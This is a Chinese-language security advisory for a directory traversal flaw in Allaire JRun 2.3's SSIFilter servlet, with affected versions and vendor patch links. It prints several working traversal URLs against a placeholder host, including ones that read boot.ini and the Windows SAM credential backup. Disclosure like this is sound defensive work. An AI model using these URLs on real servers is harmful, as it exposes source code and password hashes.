明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線(xiàn)學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

Allaire JRUN 2.3 查看任意文件漏洞

[摘要]涉及程序: JRUN 描述: Allaire JRUN 2.3 查看任意文件漏洞 詳細(xì): Allaire 的 JRUN 服務(wù)器 2.3上存在多重顯示代碼漏洞。該漏洞允許攻擊者在 WEB 服務(wù)器上查看...
涉及程序:
JRUN

描述:
Allaire JRUN 2.3 查看任意文件漏洞

詳細(xì):
Allaire 的 JRUN 服務(wù)器 2.3上存在多重顯示代碼漏洞。該漏洞允許攻擊者在 WEB 服務(wù)器上查看根目錄下的任意文件的源代碼。
JRun 2.3 使用 Java Servlets 解析各種各樣類(lèi)型的頁(yè)面(例如:HTML, JSP等等)。基于rules.properties 和 servlets.properties 的文件設(shè)置,可能利用URL前綴"/servlet/"調(diào)用任何servlet。

它可能使用 Jrun 的 SSIFilter servlet 在目標(biāo)系統(tǒng)上檢索任意的文件。下列 2 個(gè)例子顯示出能被用來(lái)檢索任意的文件的 URLs :

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../t
est.jsp

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../boot.ini

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../winnt/repair/sam._
http://jrun:8000/servlet/ssifilter/../../test.jsp
http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini

http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._

注意:假設(shè)JRun在主機(jī)“ jrun ”上運(yùn)行,端口8000。

受影響的系統(tǒng):
Allaire JRun 2.3.x

解決方案:
下載并安裝補(bǔ)。
Allaire patch jr233p_ASB00_28_29
http://download.allaire.com/jrun/jr233p_ASB00_28_29.zip
Windows 95/98/NT/2000 and Windows NT Alpha

Allaire patch jr233p_ASB00_28_29tar
http://download.allaire.com/jrun/jr233p_ASB00_28_29.tar.gz
UNIX/Linux patch - GNU gzip/tar